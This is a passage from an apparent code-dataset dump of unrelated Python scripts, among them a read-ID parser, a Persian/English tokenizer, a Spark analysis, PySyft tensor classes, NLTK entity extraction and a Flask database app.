plt.close()\n","sub_path":"tests/test_dmdoperator.py","file_name":"test_dmdoperator.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"347722717","text":"# This script parses out the read ids for each of the runs.\nimport os\nfrom tqdm import tqdm\n\ndrive_dir = \"/media/saad/Samsung_T5\"\n\nnums = {int(x[6:9]):x for x in os.listdir(os.path.join(drive_dir, 'consolidated/multiplexed'))}\nfor run_id, multiplexed in tqdm(nums.items()):\n # Get read_ids for that sample\n with open(os.path.join(drive_dir, 'consolidated/multiplexed', multiplexed), 'r') as f:\n read_ids = [x.split(' ')[0][1:] for x in f.readlines() if 'runid' in x]\n with open(os.path.join(drive_dir, f'consolidated/read_ids/{run_id}'), 'w') as f:\n f.write(\"\\n\".join(read_ids))\n ","sub_path":"scripts/sequencing/fast5_read_ids.py","file_name":"fast5_read_ids.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"157290464","text":"#!/usr/bin/python\n\nimport threading, random\n\ndef Splitter(words):\n mylist = words.split()\n newlist = []\n while (mylist):\n newlist.append(mylist.pop(random.randrange(0, len(mylist))))\n print ('- '.join(newlist))\n\nif __name__ == '__main__':\n sentence = 'The quick brown fox jumps over the lazy dog.'\n numOfThreads = 25\n threadList = []\n\n print (\"STARTING...\\n\")\n for i in range(numOfThreads):\n t = threading.Thread(target=Splitter,args=(sentence,))\n t.start()\n threadList.append(t)\n\n print (\"\\n Thread Count: \"+ str(threading.activeCount()))\n print (\"EXITING...\\n\")\n \n\n","sub_path":"threading2.py","file_name":"threading2.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"539095896","text":"import unicodedata\r\nimport texttable as tt\r\n\r\nsignAndPunctuation=[\" \",\",\",\"'\",'\"',\";\",\":\",\".\",\"+\",\"-\",\"*\",\"/\",\"(\",\")\",\"[\",\"]\",\"{\",\"}\",\"&\",\"%\",\"$\",\"#\",\"@\",\"!\",\"?\",\"~\",\"<\",\">\",\"؟\",\"!\",\":\",\"؛\",\"،\",\"٬\",\"٫\",\"٪\",\"«\",\"»\",\"\"]\r\n\r\n\r\n#Define TokensClass by which it has two objects, value and type\r\nclass tokensClass:\r\n\tvalue=\"\"\r\n\ttype=\"\"\r\n\r\n#Defining a function which reads input.txt and returns it as string\r\ndef readFromFile():\r\n\twith open('input.txt', 'r', encoding='UTF-8') as inputText:\r\n\t\tdata=inputText.read().replace('\\n', '')\r\n\treturn data\r\n\t\t\r\n#Defining a function which writes a string to the output.txt file\r\ndef writeToFile(tableContent):\r\n\t\twith open ('output.txt', 'w', encoding='UTF-8') as outputText:\r\n\t\t\toutputText.write(tableContent+\"\\n\")\r\n\r\n\r\n#Defining the main tokenizer function\t\r\ndef tokenizer(myString):\r\n\t#WhiteSpacing the string\r\n\tmyStringSplitted=mySplitter(myString)\r\n\t#Define an empty list which would store objects\r\n\tmyStringClassed = []\r\n\r\n\t#for every string in myStringSplitted, put the value and type into tokensClass\r\n\tfor eachToken in myStringSplitted:\r\n\t#define it as a tokensClass member\r\n\t\ttempStringClassed=tokensClass()\r\n\t\t#take the myStringSplitted and put it in tempStringClassed as value\r\n\t\ttempStringClassed.value=eachToken\r\n\t\t#take the categorized myStringSplitted and put it in tempStringClassed as type \r\n\t\ttempStringClassed.type=categorizer(eachToken[0])\r\n\t\t#append the tempStringClassed into myStringClassed list\r\n\t\tmyStringClassed.append(tempStringClassed)\r\n\r\n\r\n\t#print and also write the output to a file after formatting it in a table\t\r\n\twriteToFile(tableDrawer(myStringClassed))\r\n\tprint(\"\\n\\n- Process Completed!\")\r\n\tprint(\"\\n\\n- Please open Output.txt to see the results of the Toknizing!\\n\\n\")\r\n\t\r\n#Defining the function which splits the myString into tokens and returns them\r\ndef mySplitter(myString):\r\n\t#defining a temp string to put not sign characters in it before appending them into the finalList\r\n\tstringToAppend=\"\"\r\n\t#defining a temp list to put each detected token in it\r\n\tfinalList=[]\r\n\t\r\n\t#iterating through all characters in the myString\r\n\tfor eachCharacter in myString:\r\n\t\t#if the character is a sign\r\n\t\tif (eachCharacter in signAndPunctuation):\r\n\t\t\t#if the temp string (stringToAppend) is not empty (if the there hasnt been any characters before the sign character to append to the finalList)\r\n\t\t\tif (stringToAppend != \"\"):\r\n\t\t\t\t#append the strings before the sign character(stringToAppend) to the finalList\r\n\t\t\t\tfinalList.append(stringToAppend)\r\n\t\t\t\t#reset the stringToAppend to empty\r\n\t\t\t\tstringToAppend=\"\"\r\n\t\t\t\r\n\t\t\t#if the character is not a space character\r\n\t\t\tif ((eachCharacter != \" \") and (eachCharacter != \"\")):\r\n\t\t\t\t#append the character as a single token to the finalList\r\n\t\t\t\tfinalList.append(eachCharacter)\r\n\t\t\r\n\t\t#if the character is not a sign\r\n\t\telse:\r\n\t\t\t#append it to the temp string(stringToAppend)\r\n\t\t\tstringToAppend+=eachCharacter\r\n\t\r\n\t#return the finalListas the tokenized list of the myString\r\n\treturn finalList\t\r\n\r\n\t\r\n#defining a function to categorize the first character of the string under the 5 main categorys\r\ndef categorizer(myCharacter):\r\n\t#Detemining if the character is a Farsi or Arabic Number by its utf-8 code\r\n\tif((ord(myCharacter)<=ord(\"۹\") and ord(myCharacter)>=ord(\"۰\")) or (ord(myCharacter)<=ord(\"٩\") and ord(myCharacter)>=ord(\"٠\"))):\r\n\t\tmyCharacterType=\"Farsi-Numeric\"\r\n\t#Detemining if the character is a English Number by its utf-8 code\r\n\telif(ord(myCharacter)<=ord(\"9\") and ord(myCharacter)>=ord(\"0\")):\r\n\t\tmyCharacterType=\"English-Numeric\"\r\n\t#Detemining if the character is a Farsi or Arabic Alphabet by its utf-8 code\r\n\telif((ord(myCharacter)<=ord(\"ٟ\") and ord(myCharacter)>=ord(\"ؠ\")) or (ord(myCharacter)<=ord(\"ە\") and ord(myCharacter)>=ord(\"ٱ\")) ):\r\n\t\tmyCharacterType=\"Farsi-Alphabetic\"\r\n\t#Detemining if the character is a English Alphabet by its utf-8 code\r\n\telif((ord(myCharacter)<=ord(\"Z\") and ord(myCharacter)>=ord(\"A\")) or (ord(myCharacter)<=ord(\"z\") and ord(myCharacter)>=ord(\"a\")) ):\r\n\t\tmyCharacterType=\"English-Alphabetic\"\r\n\t#Detemining if the character is a Sign by its utf-8 code\r\n\telif(myCharacter in signAndPunctuation):\r\n\t\tmyCharacterType=\"Signs\"\r\n\t#If the character is none of the above, its undetermind\r\n\telse:\r\n\t\tmyCharacterType=\"Not-Determined\"\r\n\t\r\n\t#return the character type\t\r\n\treturn myCharacterType\r\n\t\r\n#Use texttable to put the final data in a beautiful table\r\ndef tableDrawer(myStringClassed):\t\r\n\ttab = tt.Texttable()\r\n\t#defining headers (column headers)\r\n\theadings = ['Token','Type']\r\n\ttab.header(headings)\r\n\t#defining each row's data lists\r\n\ttokens=[]\r\n\ttypes=[]\r\n\t#adding each tokens value and type to each row\r\n\tfor eachEntry in myStringClassed:\r\n\t\ttokens.append(eachEntry.value)\r\n\t\ttypes.append(eachEntry.type)\r\n\t#adding each row to the table\t\r\n\tfor row in zip(tokens,types):\r\n\t\ttab.add_row(row)\r\n\t#drawing the table\r\n\tfinalTable = tab.draw()\r\n\t\r\n\t#returning the table as the result of the function\r\n\treturn finalTable\r\n\t\t\r\n#defining the main table\t\t\r\ndef main():\t\r\n\tprint(\"\\n\\n\\n\\t\\t\\t*** Python Tokenizer ***\\n\\n\")\r\n\tprint(\"\\t\\tBy: Farid Akhavan - MaHaN Masboughi\\n\")\r\n\tprint(\"\\t\\tDate: April 20th, 2018\\n\")\r\n\tprint(\"\\t\\tGithub Link: https://github.com/faridcboy/PythonTokenizer\\n\\n\\n\")\r\n\tprint(\"\\n\\n- Toknizing Input.txt started!\")\r\n\ttokenizer(readFromFile())\r\n\t\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"115093655","text":"import freenect\nimport cv2\nimport numpy as np\n#import frame_convert\n\nwhile(1):\n\n frame,_ = freenect.sync_get_video()\n #image,_= cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n hsv = cv2.cvtColor(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB), cv2.COLOR_RGB2HSV)\n \n # define range of white color in HSV\n # change it according to your need !\n lower_yellow = np.array([85,100,100], dtype=np.uint8)\n upper_yellow = np.array([95,255,255], dtype=np.uint8)\n\n # Threshold the HSV image to get only white colors\n mask = cv2.inRange(hsv, lower_yellow, upper_yellow)\n \n \n cv2.imshow('frame',cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n cv2.imshow('mask',mask)\n k = cv2.waitKey(5) & 0xFF\n if k == 27:\n break\n\ncv2.destroyAllWindows()\n","sub_path":"opencvTests/colorTracking.py","file_name":"colorTracking.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"247648507","text":"import time\nimport sys\nimport os\n\ndef get_data(input_file):\n file = open(input_file, \"r\")\n n=int(file.readline())\n tasks=file.readlines()\n for i in range(0,n):\n #tasks[i] = tasks[i].split()\n tasks[i] = [int(j) for j in tasks[i].split()]\n tasks[i] = [i+1] + tasks[i]\n file.close()\n return tasks, n\n\ndef sort(tasks): \n tasks.sort(key = lambda x: x[3] - x[2] + x[1]) \n return tasks \n\ndef fastest_machine(machines):\n min = machines[0]\n idx = [0]\n for i in range(1,4):\n if machines[i] < min:\n min = machines[i]\n idx = [i]\n if machines[i] == min:\n idx.append(i)\n return idx\n\ndef assign(choice, tasks_om, counters, machines, task, latency):\n tasks_om[choice].append(task[0])\n counters[choice] += 1\n if machines[choice] < task[2]:\n machines[choice] = task[1] + task[2]\n else:\n machines[choice] += task[1]\n if machines[choice] > task[3]:\n latency += machines[choice] - task[3]\n return tasks_om, counters, machines, latency\n\ndef solution(tasks):\n machines = [0,0,0,0]\n counters = [0,0,0,0]\n tasks_om = [[],[],[],[]]\n latency = 0\n for task in tasks:\n machine_choice = fastest_machine(machines)\n if len(machine_choice) > 1:\n mini = 9999999999\n choice = machine_choice[0]\n for m in machine_choice:\n if machines[m] != 0 and counters[m] != 0:\n if counters[m]/machines[m] < mini:\n mini = counters[m]/machines[m]\n choice = m\n else:\n choice = m\n mini = 0\n #print(choice)\n tasks_om, counters, machines, latency = assign(choice, tasks_om, counters, machines, task, latency)\n else:\n tasks_om, counters, machines, latency = assign(machine_choice[0], tasks_om, counters, machines, task, latency)\n return tasks_om, latency\n\ndef save_results(tasks, latency, n):\n outputF = \"results/132302/a1/\" + sys.argv[1] + \"/\" + str(n) + \".txt\"\n file = open(outputF,\"w\")\n file.write(str(latency) + '\\n')\n for task in tasks:\n temp = \"\"\n for id in task:\n temp += str(id) + ' '\n #file.write(str(id)+ ' ' )\n file.write(temp[:len(temp)-1]+'\\n')\n\n\ndef algorithm(instance):\n if not os.path.exists(\"results/132302/a1/\" + sys.argv[1] + \"/\"):\n os.makedirs(\"results/132302/a1/\" + sys.argv[1] + \"/\")\n inputF = \"instances/\"+ sys.argv[1] + \"/\" + str(instance) + \".txt\"\n tasks_list, n = get_data(inputF)\n tasks_list = sort(tasks_list)\n tasks, latency = solution(tasks_list)\n save_results(tasks, latency, n)\n #return latency\n\ndef main():\n algorithm(int(sys.argv[2]))\n\nif __name__ == '__main__':\n main()\n","sub_path":"algorithms/132302/a1.py","file_name":"a1.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"571291381","text":"# future\nfrom __future__ import annotations\n\n# stdlib\nfrom typing import Any\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom typing import Type\nimport uuid\n\n# third party\nfrom nacl.signing import VerifyKey\nfrom numpy.typing import ArrayLike\n\n# relative\nfrom ..adp.vm_private_scalar_manager import VirtualMachinePrivateScalarManager\nfrom .manager import TensorChainManager\nfrom .passthrough import PassthroughTensor # type: ignore\nfrom .passthrough import is_acceptable_simple_type # type: ignore\n\n_SingleEntityPhiTensorRef = None\n\n\ndef _SingleEntityPhiTensor() -> Type[PassthroughTensor]:\n global _SingleEntityPhiTensorRef\n if _SingleEntityPhiTensorRef is None:\n # relative\n # relative\n from .autodp.single_entity_phi import SingleEntityPhiTensor\n\n _SingleEntityPhiTensorRef = SingleEntityPhiTensor\n return _SingleEntityPhiTensorRef\n\n\n_RowEntityPhiTensorRef = None\n\n\ndef _RowEntityPhiTensor() -> Type[PassthroughTensor]:\n global _RowEntityPhiTensorRef\n if _RowEntityPhiTensorRef is None:\n # relative\n # relative\n from .autodp.row_entity_phi import RowEntityPhiTensor\n\n _RowEntityPhiTensorRef = RowEntityPhiTensor\n return _RowEntityPhiTensorRef\n\n\n_AutogradTensorRef = None\n\n\ndef _AutogradTensor() -> Type[PassthroughTensor]:\n global _AutogradTensorRef\n if _AutogradTensorRef is None:\n # relative\n # relative\n from .autograd.tensor import AutogradTensor\n\n _AutogradTensorRef = AutogradTensor\n return _AutogradTensorRef\n\n\nclass AutogradTensorAncestor(TensorChainManager):\n \"\"\"Inherited by any class which might have or like to have AutogradTensor in its chain\n of .child objects\"\"\"\n\n @property\n def grad(self): # type: ignore\n child_gradient = self.child.grad\n if child_gradient is None:\n return None\n return self.__class__(child_gradient)\n\n @property\n def requires_grad(self) -> bool:\n return self.child.requires_grad\n\n def backward(self, grad=None): # type: ignore\n\n AutogradTensor = _AutogradTensor()\n\n # TODO: @Madhava question, if autograd(requires_grad=True) is not set\n # we still end up in here from AutogradTensorAncestor but child.backward\n # has no backprop_id\n if isinstance(self.child, AutogradTensorAncestor) or isinstance(\n self.child, AutogradTensor\n ):\n\n if grad is not None and not is_acceptable_simple_type(grad):\n grad = grad.child\n\n return self.child.backward(grad, backprop_id=uuid.uuid4()) # type: ignore\n else:\n raise Exception(\n \"No AutogradTensor found in chain, but backward() method called.\"\n )\n\n def autograd(self, requires_grad: bool = True) -> AutogradTensorAncestor:\n AutogradTensor = _AutogradTensor()\n\n self.push_abstraction_top(AutogradTensor, requires_grad=requires_grad) # type: ignore\n\n return self\n\n\nclass PhiTensorAncestor(TensorChainManager):\n \"\"\"Inherited by any class which might have or like to have SingleEntityPhiTensor in its chain\n of .child objects\"\"\"\n\n def __init__(self, child: Any) -> None:\n self.child = child\n\n @property\n def shape(self) -> List[int]:\n return self.child.shape\n\n @property\n def min_vals(self): # type: ignore\n return self.__class__(self.child.min_vals)\n\n @property\n def max_vals(self): # type: ignore\n return self.__class__(self.child.max_vals)\n\n @property\n def gamma(self): # type: ignore\n return self.__class__(self.child.gamma)\n\n def publish(self, acc: Any, sigma: float, user_key: VerifyKey) -> PhiTensorAncestor:\n return self.__class__(\n self.child.publish(acc=acc, sigma=sigma, user_key=user_key)\n )\n\n def private(\n self,\n min_val: ArrayLike,\n max_val: ArrayLike,\n scalar_manager: VirtualMachinePrivateScalarManager = VirtualMachinePrivateScalarManager(),\n entities: Optional[List] = None,\n entity: Optional[Dict[str, Any]] = None,\n ) -> PhiTensorAncestor:\n \"\"\" \"\"\"\n\n if entity is not None:\n # if there's only one entity - push a SingleEntityPhiTensor\n\n if isinstance(min_val, (float, int)):\n min_vals = (self.child * 0) + min_val\n else:\n raise Exception(\n \"min_val should be a float, got \" + str(type(min_val)) + \" instead.\"\n )\n\n if isinstance(max_val, (float, int)):\n max_vals = (self.child * 0) + max_val\n else:\n raise Exception(\n \"min_val should be a float, got \" + str(type(min_val)) + \" instead.\"\n )\n\n self.push_abstraction_top(\n _SingleEntityPhiTensor(),\n entity=entity,\n min_vals=min_vals,\n max_vals=max_vals,\n scalar_manager=scalar_manager, # type: ignore\n )\n\n # if there's row-level entities - push a RowEntityPhiTensor\n elif entities is not None and len(entities) == self.shape[0]:\n\n class_type = _SingleEntityPhiTensor()\n\n new_list = list()\n for i, entity in enumerate(entities):\n\n if isinstance(min_val, (float, int)):\n min_vals = (self.child[i : i + 1] * 0) + min_val # noqa: E203\n else:\n raise Exception(\n \"min_val should be a float, got \"\n + str(type(min_val))\n + \" instead.\"\n )\n\n if isinstance(max_val, (float, int)):\n max_vals = (self.child[i : i + 1] * 0) + max_val # noqa: E203\n else:\n raise Exception(\n \"min_val should be a float, got \"\n + str(type(min_val))\n + \" instead.\"\n )\n\n value = self.child[i : i + 1] # noqa: E203\n\n new_list.append(\n class_type(\n child=value,\n entity=entity,\n min_vals=min_vals,\n max_vals=max_vals,\n scalar_manager=scalar_manager,\n )\n )\n\n self.replace_abstraction_top(_RowEntityPhiTensor(), rows=new_list) # type: ignore\n\n # TODO: if there's element-level entities - push all elements with PhiScalars\n else:\n\n raise Exception(\n \"If you're passing in mulitple entities, please pass in one entity per row.\"\n )\n\n return self\n","sub_path":"packages/syft/src/syft/core/tensor/ancestors.py","file_name":"ancestors.py","file_ext":"py","file_size_in_byte":6781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"233988140","text":"import pymysql\r\n\r\ndef db_connect():\r\n # 打开数据库连接\r\n db = pymysql.connect(host='localhost', user='root', passwd=\"\", db='district_pinyin')\r\n # 使用 cursor() 方法创建一个游标对象 cursor\r\n cursor = db.cursor()\r\n return (db, cursor)\r\n\r\n\r\ndef init_provinces():\r\n db = db_connect()[0]\r\n cursor = db_connect()[1]\r\n # 使用 execute() 方法执行 SQL 查询\r\n province_sql = \"SELECT id, shortname, pinyin FROM district_pinyin.china_district_pinyin where level=1; \"\r\n try:\r\n # 执行SQL语句\r\n cursor.execute(province_sql)\r\n # 获取所有记录列表\r\n results = cursor.fetchall()\r\n return results\r\n except:\r\n print(\"Error: unable to fetch data\")\r\n finally:\r\n db.close()\r\n\r\n\r\ndef init_cities():\r\n db = db_connect()[0]\r\n cursor = db_connect()[1]\r\n # 使用 execute() 方法执行 SQL 查询\r\n city_sql = \"SELECT pid, shortname, pinyin FROM district_pinyin.china_district_pinyin where level=2; \"\r\n try:\r\n # 执行SQL语句\r\n cursor.execute(city_sql)\r\n # 获取所有记录列表\r\n results = cursor.fetchall()\r\n return results\r\n except:\r\n print(\"Error: unable to fetch data\")\r\n finally:\r\n db.close()\r\n\r\n\r\n\r\n\r\n","sub_path":"mysqlCon.py","file_name":"mysqlCon.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"600956483","text":"#!/usr/bin/env python3\nimport sys, os, pickle, time, random\n#from functools import reduce\n#from functools import partial\n#import tkinter # tk-devel tcl-devel 是模版tkinter依赖的软件包\n#import sqlite3 # sqlite-devel sqlite #模版sqlite3 依赖的软件包 \n\n\"MoBan ------------ instruction\"\nprint('\\033[31;47;1m__name__ is %s\\033[0m' % __name__)\n\ndate = time.strftime('%Y年*%m月*%d日 %H时:%M分:%S秒',time.localtime())\n\ndef loop():\n endlist = []\n for i in range(1,5):\n endlist.append(i)\n time.sleep(0.1)\n print(date)\n return endlist #返回的是一个列表数据\n\n\ndef timetest(functionx):\n start = time.time()\n result = functionx() #result获取的是一个列表数据(如果参数functionx = loop的话)\n return time.time() - start, result #返回元组数据类型\n\n\n# decorate 装饰;布置\ndef decorate(func):\n\n def timetit(): #内部函数timeit() 和 timetest(functionx) 的作用是一样的\n start = time.time()\n result = func() #result获取的是一个列表数据(如果参数func = loop的话)\n return time.time() -start, result #返回元组数据类型\n return timetit\n\n\n@decorate #@decorate 装饰器 的作用等同于loop_2 = decorate(loop_2)\ndef loop_2():\n endlist = []\n for i in range(1,5):\n endlist.append(i)\n time.sleep(0.1)\n print(date)\n return endlist #返回的是一个列表数据\n\n\n\n\nif __name__ == '__main__':\n print('\\033[30;43;1m sys.argv is %s\\033[0m\\n' % sys.argv)\n\n received = timetest(loop)\n #2019年*04月*09日 19时:25分:58秒 \n print(type(received),received,sep= ' ---',end = ' --timetest(loop)\\n\\n')\n # ---(0.4012415409088135, [1, 2, 3, 4]) --timetest(loop) \n\n\n received_2 = loop()\n #2019年*04月*09日 19时:25分:58秒\n print(type(received_2),received_2,sep= ' $$ ',end = ' --loop()\\n\\n')\n # $$ [1, 2, 3, 4] --loop()\n\n\n loop = decorate(loop) #返回的是一个内部函数timeit()\n #调用函数timeit() 会 返回一个元组类型的数据\n # 效果等于直接使用函数timetest(loop),会 返回一个元组类型的数据\n received_3 = loop()\n #2019年*04月*09日 19时:25分:58秒\n print(type(received_3),received_3,sep= ' *** ',end = ' --decorate(loop)\\n\\n')\n # *** (0.4016764163970947, [1, 2, 3, 4]) --decorate(loop)\n\n \n #不修改原有的旧函数,但是改变了函数的功能,别人可以把此函数按照习惯用法来使用\n received_4 = loop_2() #不修改原有的旧函数\n #2019年*04月*09日 19时:25分:58秒\n print(type(received_4),received_4,sep= ' ### ',end = ' --loop_2()\\n')\n # ### (0.40166783332824707, [1, 2, 3, 4]) --loop_2()\n\n\n\n\n","sub_path":"pythonScripts/day06/looptime.py","file_name":"looptime.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"526861968","text":"# -*- coding: utf-8 -*-\nfrom pyspark.sql import SparkSession\nspark = SparkSession.builder.getOrCreate()\nfrom pyspark.sql.types import *\nimport os,re\nimport time\nimport matplotlib.pyplot as plt \n\npath = \"./data/données/\"\nr=\".csv$\"\nfor f in os.listdir(path):\n pathname = os.path.join(path, f)\n s=pathname.split('/')\n name=s[len(s)-1]\n print(name)\n if (re.search(r,pathname)):\n df = spark.read.format('csv').options(header=True, inferSchema=True).load(pathname)\n # #calcul age moyen\n df.agg({\"age\" : \"mean\"}).show()\n #comparaison en pourcentage des jeunes vs vieux\n df.describe(['age']).show()\n #calculer le pourcentage des employée de plus de 30ans\n nb=df.filter(\"age > 30\").select(['age']).count()\n cpt=df.count()\n pour=nb/cpt\n pour*100\n\n #comparaison nb H vs F\n res=df.groupBy('sex').count()\n # res.repartition(1).write.csv(\"./data/result/sex\"+name)\n\n #la semaines ou y a eu plus de poste abolished\n df.createOrReplaceTempView(\"data_table\")\n # abolished=spark.sql(\"SELECT count(*) as jobEstablished FROM data_table where joblost='position_abolished'\")\n # abolished.repartition(1).write.csv(\"./data/result/abolished_\"+name)\n","sub_path":"spark.py","file_name":"spark.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"56501096","text":"# ---------------------------------------------------------------------------- #\n#\n# ---------------------------------------------------------------------------- #\n\nimport maya.OpenMaya as om\nimport maya.cmds as cmds\n\nimport config\n\ndef _reload():\n reload(config)\n\n# ---------------------------------------------------------------------------- #\n\ndef getMeshFn(meshName):\n cmds.select(meshName, replace = True)\n\n list = om.MSelectionList()\n om.MGlobal_getActiveSelectionList(list)\n obj = om.MObject()\n dpath = om.MDagPath()\n list.getDagPath(0, dpath, obj)\n meshFn = om.MFnMesh(dpath)\n \n return meshFn\n\ndef resetMesh(meshFn, cache):\n setVertices(meshFn, cache)\n\ndef getVertices(meshFn):\n vts = om.MPointArray()\n meshFn.getPoints(vts)\n return vts\n\ndef setVertices(meshFn, vts):\n meshFn.setPoints(vts)\n \ndef applyPose(meshFn, cache, weights, aRI, bRI, aCM, bCM):\n arr = om.MPointArray()\n\n for i in range(0, cache.length()):\n w1, w2 = weights[i]\n p = om.MPoint(cache[i])\n \n p1 = p * (aCM * aRI)\n p2 = p * (bCM * bRI)\n pNew = om.MPoint(om.MVector(p1 * w1) + om.MVector(p2 * w2))\n \n if config.verbose > 0:\n print (\"Updated vertex for mesh.\" + \n \"\\nWas - %2.2f, %2.2f, %2.2f\" % (p.x, p.y, p.z) +\n \"\\nNow - %2.2f, %2.2f, %2.2f\" % (pNew.x, pNew.y, pNew.z))\n arr.append(pNew)\n setVertices(meshFn, arr)","sub_path":"SSD/MeshProcessing.py","file_name":"MeshProcessing.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"441291419","text":"\"\"\"This module contains a Rod class for Tower of Hanoi game.\"\"\"\nfrom __future__ import annotations\nfrom typing import Optional, Tuple\n\nfrom stack_with_singly_linked_list import Stack\nfrom tower_of_hanoi.disk import Disk\n\n\nclass Rod(Stack):\n members_dictionary = {}\n\n def __init__(\n self,\n name: str,\n first_element: Optional[Disk] = None) -> None:\n \"\"\"Creates a Rod class object.\n\n Rod is based on a stack Data Structure. If first_element argument is\n provided, a Rod already containing 1 element (a Disk) is created).\n\n Every time a Rod object is created it is also added to a class\n attribute, a members_dictionary, through which a user can access all\n the rods by specifying their name as a key. In Tower of Hanoi game\n there are always 3 rods with the following names: 'left', 'central',\n 'right'.\n \"\"\"\n super().__init__(first_element)\n self.__name = name\n self.__add_self_to_members_dictionary()\n\n def __add_self_to_members_dictionary(self) -> None:\n \"\"\"Adds the given instance of a Rod class to the class attribute\n dictionary. Key is the name of the Rod, value is the Rod itself.\"\"\"\n Rod.members_dictionary[self.name] = self\n\n @property\n def name(self) -> str:\n return self.__name\n\n def push_disk_on_top(self, disk: Disk) -> bool:\n \"\"\"Tries to push a given disk at the top of the Rod Disks Stack.\n\n If successful, returns True. Else, returns False.\"\"\"\n current_top_disk = self.peek_element_from_top()\n\n if disk.check_if_target_disk_below_exists_and_is_bigger(current_top_disk):\n self.push_element_on_top(disk)\n return True\n\n return False\n","sub_path":"PythonCode/tower_of_hanoi/rod.py","file_name":"rod.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"458978400","text":"import nltk\nimport wikipedia\nfrom string import punctuation\nfrom collections import Counter\nfrom nltk.corpus import stopwords\nfrom os import path\nfrom operator import itemgetter\n\ntext = None\nwith open('text.txt', 'r') as f:\n text = f.read()\n\ndef extractEntities(ne_chunked):\n data = {}\n for entity in ne_chunked:\n if isinstance(entity, nltk.tree.Tree):\n text = \" \".join([word for word, tag in entity.leaves()])\n ent = entity.label()\n data[text] = ent\n else:\n continue\n return data\n\ndef extractDescription(ne_chunked):\n entities = []\n for entity in ne_chunked:\n if isinstance(entity, nltk.tree.Tree):\n text = \" \".join([word for word, tag in entity.leaves()])\n entities.append(text)\n else:\n continue\n return entities\n\ndef getNeChunkEntities(tagged):\n chunked = nltk.ne_chunk(tagged)\n extracted = extractEntities(chunked)\n asList = list(extracted.keys())\n return asList\n\ndef getCustomEntities(tagged):\n entity = []\n entities = []\n for entry in tagged:\n if (entry[1].startswith(\"NN\") or (entity and entry[1].startswith(\"IN\"))):\n entity.append(entry)\n else:\n if (entity and entity[-1][1].startswith(\"IN\")):\n entity.pop()\n if (entity and \" \".join(e[0] for e in entity)[0].isupper()):\n entities.append(\" \".join(e[0] for e in entity))\n entity = []\n return entities\n\ndef getWikiDescription(entity):\n summary = wikipedia.page(entity).summary\n firstSentence = nltk.sent_tokenize(summary)[0]\n tokens = nltk.word_tokenize(firstSentence)\n nopunc = [token for token in tokens if token not in punctuation]\n tagged = nltk.pos_tag(nopunc)\n grammar = \"VBZ: {
    ?*}\"\n cp = nltk.RegexpParser(grammar)\n chunked = cp.parse(tagged)\n desc = \" \".join(extractDescription(chunked)).strip()\n return desc\n\ndef getWikiClassification(chunked):\n results = {}\n\n for entity in neChunkedEntities:\n if hasattr(results, entity):\n continue\n try:\n results[entity] = getWikiDescription(entity)\n if len(results[entity]) == 0:\n results[entity] = \"Thing\"\n except:\n results[entity] = \"Thing\"\n return results\n\ntokens = nltk.word_tokenize(text)\nnopunc = [token for token in tokens if token not in punctuation]\ntagged = nltk.pos_tag(nopunc)\n\nneChunkedEntities = list(set(getNeChunkEntities(tagged)))\ncustomEntities = list(set(getCustomEntities(tagged)))\nneChunkedClassification = getWikiClassification(neChunkedEntities)\ncustomEntitiesClassification = getWikiClassification(customEntities)\n\nprint(extractEntities(nltk.ne_chunk(tagged)))\nprint(neChunkedClassification)\nprint(customEntitiesClassification)\n","sub_path":"hw3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"131572490","text":"from flask import Flask, render_template, redirect, url_for, request, flash\nfrom flask_sqlalchemy import SQLAlchemy\nimport pymysql\nfrom flask_migrate import Migrate # importing our latest dependency\nfrom dotenv import load_dotenv\nimport os\n\napp = Flask(__name__)\nload_dotenv()\n\nSQL_DIALECT_DRIVER = os.getenv(\"SQL_DIALECT_DRIVER\")\nSQL_U_NAME = os.getenv(\"SQL_U_NAME\")\nSQL_U_PASSWORD = os.getenv(\"SQL_U_PASSWORD\")\n#SQL_DB_ACCESS_INSTANCE_NAME_PORT = os.getenv(\"SQL_DB_ACCESS_INSTANCE_NAME_PORT\")\nSQL_DB_NAME = os.getenv(\"SQL_DB_NAME\")\nSECRET_KEY = os.getenv(\"SECRET_KEY\")\n\napp.secret_key = f\"{SECRET_KEY}\"\n\napp.config['SQLALCHEMY_DATABASE_URI'] = f\"{SQL_DIALECT_DRIVER}://{SQL_U_NAME}:{SQL_U_PASSWORD}@mysql/{SQL_DB_NAME}\"\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS']= False\n\ndb = SQLAlchemy(app)\nMigrate(app, db) \n\nclass Data(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = 